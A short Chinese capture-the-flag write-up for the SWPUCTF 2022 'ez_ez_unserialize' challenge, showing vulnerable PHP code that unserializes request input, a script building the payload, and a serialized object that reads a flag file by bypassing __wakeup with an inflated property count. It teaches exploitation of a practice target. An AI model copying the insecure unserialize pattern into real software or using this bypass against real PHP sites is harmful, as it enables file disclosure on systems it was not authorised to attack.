复健第二天之[SWPUCTF 2022 新生赛]ez_ez_unserialize

打开题目在线环境直接看到源码:

php 复制代码
<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

审计这些php代码,是反序列化,然后根据这个构造pop链:

php 复制代码
<?php

class X
{
    public $x = 'fllllllag.php';
}

$a = new X;
echo serialize($a);

?>

输出 的反序列化数据为:

*O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

这里绕过weakup,修改 "X" 后的 1(成员属性数量) 大于 1(实际数量) 即可。

最后再用GET或者POST 方法传参得到flag。

相关推荐
码农12138号7 小时前
Bugku NUAACTF 2020 command-injection
web安全·代码审计·bugku·文件包含漏洞
iknow1817 小时前
【Web安全】SSRF
安全·web安全
pandarking9 小时前
[CTF]攻防世界:love_math
android·web安全·网络安全
小痞同学9 小时前
【网络安全】二、常用网络安全管理工具
安全·web安全·网络安全
小痞同学9 小时前
【网络安全】一、虚拟局域网设置和应用
网络·安全·web安全·网络安全
lingggggaaaa9 小时前
C2远控篇&C&C++&SC转换格式&UUID标识&MAC物理&IPv4地址&减少熵值
c语言·c++·学习·安全·web安全·网络安全·免杀对抗
码农12138号9 小时前
Bugku 2023 HackINI Virtual Shop 和 2023 HackINI Virtual Shop 2
web安全·sqlite·sql注入
码农12138号9 小时前
网络安全 文件包含漏洞
web安全·文件包含漏洞
Suckerbin1 天前
Gaara: 1靶场渗透
安全·web安全·网络安全
是喵斯特ya1 天前
phpstudy+安全狗搭建安全靶场
安全·web安全